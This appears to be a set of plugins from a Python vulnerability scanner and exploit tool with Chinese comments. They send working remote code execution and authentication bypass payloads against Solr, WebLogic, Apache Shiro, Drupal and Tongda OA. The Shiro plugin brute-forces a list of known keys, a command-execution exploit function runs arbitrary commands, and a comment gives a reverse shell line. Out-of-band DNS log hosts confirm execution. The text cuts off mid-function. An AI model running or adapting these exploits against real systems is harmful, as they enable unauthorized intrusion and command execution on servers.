def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
DL = Dnslog() # 初始化DNSlog
#POC没问题DNSlog有问题
# DL="p61rpm.dnslog.cn"
data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(
DL.dns_host())
resp = requests.post(payload_url,
data=data2,
headers=headers,
proxies=proxies,
timeout=20,
verify=False)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(
url, payload_url, data2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
#<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>反弹shell,替换ping位置数据
linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
for data in [linux_data, windows_data]:
try:
payload = '/wls-wsat/CoordinatorPortType'
payload_url = scheme + "://" + url + ":" + str(port) + payload
Headers["Content-Type"] = "text/xml"
resp = requests.post(payload_url,
headers=Headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
time.sleep(4)
if DL.result():
Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(
url, payload_url, data, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
Headers1 = Headers
Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
payload_url = url + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=Headers1).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
payload_url1 = url + payload
payload_url2 = url + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
Headers2 = Headers
Headers2['Content-Type'] = 'application/json'
resp = requests.post(payload_url1,
data=payload_data,
headers=Headers2,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=Headers1,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
cod2 = resp2.status_code
if con2.find("uid=") != -1 and con2.find(
"groups=") != -1 and con2.find(
"gid=") != -1 and cod2 == 200:
Medusa = "{} 存在SolrVelocity模板远程代码执行漏洞(CVE-2019-17558)\r\n验证数据:\r\n使用Payload:\r\n{}回显内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp2,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command").replace(' ', '+') #对空格进行处理
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
command)
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
ExploitOutput().Banner(OutputData=con2) #无回显调用函数
_t = VulnerabilityInfo(resp.text)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
cod2 = resp2.status_code
if con2.find("uid=") != -1 and con2.find(
"groups=") != -1 and con2.find(
"gid=") != -1 and cod2 == 200:
Medusa = "{} 存在SolrVelocity模板远程代码执行漏洞(CVE-2019-17558)\r\n验证数据:\r\n使用Payload:\r\n{}回显内容:{}\r\n".format(
url, payload_url2, con2)
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/general/login_code.php'
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload2 = '/logincheck_code.php'
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload3 = "/general/index.php"
payload_url3 = scheme + "://" + url + ":" + str(port) + payload3
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
res = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
restext = str(res.text).split('{')
codeuid = restext[-1].replace('}"}', '').replace('\r\n', '')
resp = requests.post(payload_url2,
data={
'CODEUID': '{' + codeuid + '}',
'UID': int(1)
},
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
head = resp.headers.get('Set-Cookie').replace('path=/', '')
headers2 = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Cookie": head
}
resp2 = requests.get(payload_url3,
headers=headers2,
proxies=proxies,
timeout=6,
verify=False)
code = resp2.status_code
con = resp2.text
if code == 200 and (
con.find("""<li><a id="on_status_1" href="javascript:""") != -1
and con.find(
"""<a id="logout_btn" class="logout" href="javascript""")
!= -1) or (con.find("通达云市场") != -1
and con.find("通达OA在线帮助") != -1
and con.find("注销") != -1):
Medusa = "{}存在通达OA任意使用管理员账号登录漏洞\r\n验证数据:\r\n管理员COOKIE:{}\r\n漏洞返回页面:{}\r\n".format(
url, head, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
ExpClass = "JRMPClient"
CipherKey = ["kPH+bIxk5D2deZiIxcaaaA==", "2AvVhdsgUs0FSA3SDFAdag==", "3AvVhmFLUs0KTA3Kprsdag==",
"4AvVhmFLUs0KTA3Kprsdag==", "5AvVhmFLUs0KTA3Kprsdag==",
"5aaC5qKm5oqA5pyvAAAAAA==", "6ZmI6I2j5Y+R5aSn5ZOlAA==", "bWljcm9zAAAAAAAAAAAAAA==",
"wGiHplamyXlVB11UXWol8g==",
"Z3VucwAAAAAAAAAAAAAAAA==", "MTIzNDU2Nzg5MGFiY2RlZg==", "U3ByaW5nQmxhZGUAAAAAAA==",
"fCq+/xW488hMTCD+cmJ3aQ==", "1QWLxg+NYmxraMoxAXu/Iw==", "ZUdsaGJuSmxibVI2ZHc9PQ==",
"L7RioUULEFhRyxM7a2R/Yg==",
"r0e3c16IdVkouZgk1TKVMg==", "bWluZS1hc3NldC1rZXk6QQ==", "a2VlcE9uR29pbmdBbmRGaQ==",
"WcfHGU25gNnTxTlmJMeSpw==",
"OY//C4rhfwNxCQAQCrQQ1Q==",
"5J7bIJIV0LQSN3c9LPitBQ==",
"f/SY5TIve5WWzT4aQlABJA==",
"bya2HkYo57u6fWh5theAWw==",
"WuB+y2gcHRnY2Lg9+Aqmqg==",
"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
"3qDVdLawoIr1xFd6ietnwg==",
"ZWvohmPdUsAWT3=KpPqda",
"YI1+nBV//m7ELrIyDHm6DQ==",
"6Zm+6I2j5Y+R5aS+5ZOlAA==",
"2A2V+RFLUs+eTA3Kpr+dag==",
"6ZmI6I2j3Y+R1aSn5BOlAA==",
"SkZpbmFsQmxhZGUAAAAAAA==",
"2cVtiE83c4lIrELJwKGJUw==",
"fsHspZw/92PrS3XrPW+vxw==",
"XTx6CKLo/SdSgub+OPHSrw==",
"sHdIjUN6tzhl8xZMG3ULCQ==",
"O4pdf+7e+mZe8NyxMTPJmQ==",
"HWrBltGvEZc14h9VpMvZWw==",
"rPNqM6uKFCyaL10AK51UkQ==",
"Y1JxNSPXVwMkyvES/kJGeQ==",
"lT2UvDUmQwewm6mMoiw4Ig==",
"MPdCMZ9urzEA50JDlDYYDg==",
"xVmmoltfpb8tTceuT5R7Bw==",
"c+3hFGPjbgzGdrC+MHgoRQ==",
"ClLk69oNcA3m+s0jIMIkpg==",
"Bf7MfkNR0axGGptozrebag==",
"1tC/xrDYs8ey+sa3emtiYw==",
"ZmFsYWRvLnh5ei5zaGlybw==",
"cGhyYWNrY3RmREUhfiMkZA==",
"IduElDUpDDXE677ZkhhKnQ==",
"yeAAo1E8BOeAYfBlm4NG9Q==",
"cGljYXMAAAAAAAAAAAAAAA==",
"2itfW92XazYRi5ltW0M2yA==",
"XgGkgqGqYrix9lI6vxcrRw==",
"ertVhmFLUs0KTA3Kprsdag==",
"5AvVhmFLUS0ATA4Kprsdag==",
"s0KTA3mFLUprK4AvVhsdag==",
"hBlzKg78ajaZuTE0VLzDDg==",
"9FvVhtFLUs0KnA3Kprsdyg==",
"d2ViUmVtZW1iZXJNZUtleQ==",
"yNeUgSzL/CfiWw1GALg6Ag==",
"NGk/3cQ6F5/UNPRh8LpMIg==",
"4BvVhmFLUs0KTA3Kprsdag==",
"MzVeSkYyWTI2OFVLZjRzZg==",
"CrownKey==a12d/dakdad",
"empodDEyMwAAAAAAAAAAAA==",
"A7UzJgh1+EWj5oBFi+mSgw==",
"YTM0NZomIzI2OTsmIzM0NTueYQ==",
"c2hpcm9fYmF0aXMzMgAAAA==",
"i45FVt72K2kLgvFrJtoZRw==",
"U3BAbW5nQmxhZGUAAAAAAA==",
"ZnJlc2h6Y24xMjM0NTY3OA==",
"Jt3C93kMR9D5e8QzwfsiMw==",
"MTIzNDU2NzgxMjM0NTY3OA==",
"vXP33AonIp9bFwGl7aT7rA==",
"V2hhdCBUaGUgSGVsbAAAAA==",
"Z3h6eWd4enklMjElMjElMjE=",
"Q01TX0JGTFlLRVlfMjAxOQ==",
"ZAvph3dsQs0FSL3SDFAdag==",
"Is9zJ3pzNh2cgTHB4ua3+Q==",
"NsZXjXVklWPZwOfkvk6kUA==",
"GAevYnznvgNCURavBhCr1w==",
"66v1O8keKNV3TTcGPK1wzg==",
"SDKOLKn2J1j/2BHjeZwAoQ==",
]
BLOCK_SIZE = AES.block_size
PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes
YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
DL = Dnslog()
for key in CipherKey:
try:
popen = subprocess.Popen(["java", "-jar", YsoserialPath, ExpClass,DL.dns_host()], stdout=subprocess.PIPE)
encryptor = AES.new(base64.b64decode(key), AES_MODE, AES_IV)
file_body = PAD_FUNC(popen.stdout.read())
base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))
payload_url = scheme + "://" + url + ":" + str(port)
cookies = {"jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",
"rememberMe": base64_ciphertext.decode()}
requests.get(payload_url,cookies=cookies, proxies=proxies, timeout=3, verify=False)
if DL.result():
Medusa = "{}存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\ncookie:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format(url,payload_url,key,cookies,DL.dns_host(),DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
break
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/ws_utc/resources/setting/keystore?timestamp=139114985403'
payload_url = scheme + "://" + url + ":" + str(port) + payload
RM1 = randoms().result(10)
RM2 = randoms().result(100)
data = '''------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_name"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_front"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_changed"
true
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_filename"; filename="{}.jsp"
Content-Type: application/octet-stream
{}
------WebKitFormBoundaryzVtngnKbQt01czaO--
'''.format(RM1, RM2)
Headers[
"Content-Type"] = "multipart/form-data; boundary=----WebKitFormBoundaryzVtngnKbQt01czaO"
resp = requests.post(payload_url,
headers=Headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(RM1 +
".jsp") != -1 and con.find(RM2) != -1:
Medusa = "{}存在Weblogic任意文件上传漏洞(CVE-2018-2894)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n上传文件名:{}\r\n上传文件内容:{}\r\n".format(
url, payload_url, con, RM1 + ".jsp", RM2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
#想要执行的命令
shell = "id"
data = """
{
"link": [
{
"value": "link",
"options": "O:24:\\"GuzzleHttp\\\\Psr7\\\\FnStream\\":2:{s:33:\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\";a:1:{s:5:\\"close\\";a:2:{i:0;O:23:\\"GuzzleHttp\\\\HandlerStack\\":3:{s:32:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\";s:%s:\\"%s\\";s:30:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\";a:1:{i:0;a:1:{i:0;s:6:\\"system\\";}}s:31:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\";b:0;}i:1;s:7:\\"resolve\\";}}s:9:\\"_fn_close\\";a:2:{i:0;r:4;i:1;s:7:\\"resolve\\";}}"
}
],
"_links": {
"type": {
"href": "%s/rest/type/shortcut/default"
}
}
}""" % (len(shell), shell, scheme + "://" + url + ":" + str(port))
payload = '/node/?_format=hal_json'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Connection': 'keep-alive',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/hal+json",
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
code = resp.status_code
res = resp.text
if code == 403 and res.find("message") != -1 and res.find(
"uid=") != -1 and res.find("gid=") != -1 and res.find(
"groups=") != -1:
Medusa = "{}存在Drupal远程执行代码漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n使用POC:{}\r\n返回结果:{}\r\n".format(
url, payload_url, data, res)
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
upload_url = scheme + "://" + url + ":" + str(
port) + '/ispirit/im/upload.php'
rm = randoms().result(50)
rm_file = randoms().result(10)
headers = {
"User-Agent":
RandomAgent,
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":
"gzip, deflate",
"X-Forwarded-For":
"127.0.0.1",
"Connection":
"close",
"Upgrade-Insecure-Requests":
"1",
"Content-Type":
"multipart/form-data; boundary=---------------------------27723940316706158781839860668"
}
file_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\necho \"%s\"\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" % (
rm_file, rm)
upload_resp = requests.post(upload_url,
headers=headers,
proxies=proxies,
data=file_data)
name = "".join(re.findall("2003_(.+?)\|", upload_resp.text))
get_shell_url = scheme + "://" + url + ":" + str(
port) + '/ispirit/interface/gateway.php'
headers = {
"User-Agent": RandomAgent,
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Forwarded-For": "127.0.0.1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"json":
"{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" %
(name, rm_file)
}
get_shell_resp = requests.post(get_shell_url,
headers=headers,
proxies=proxies,
data=data)
con = get_shell_resp.text
code = get_shell_resp.status_code
if code == 200 and con.find(rm) != -1:
Medusa = "{}存在通达OA任意文件上传&远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n上传文件内容:{}\r\n返回随机数:{}\r\n如需执行命令请在脚本中修改函数".format(
url, get_shell_url, data, file_data, con)
#如果需要使用命令执行把下面这行注释打开即可
#command(scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=Headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = "/solr/" + name + "/update"
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
DL = Dnslog() # 初始化DNSlog
rm = randoms().result(10)
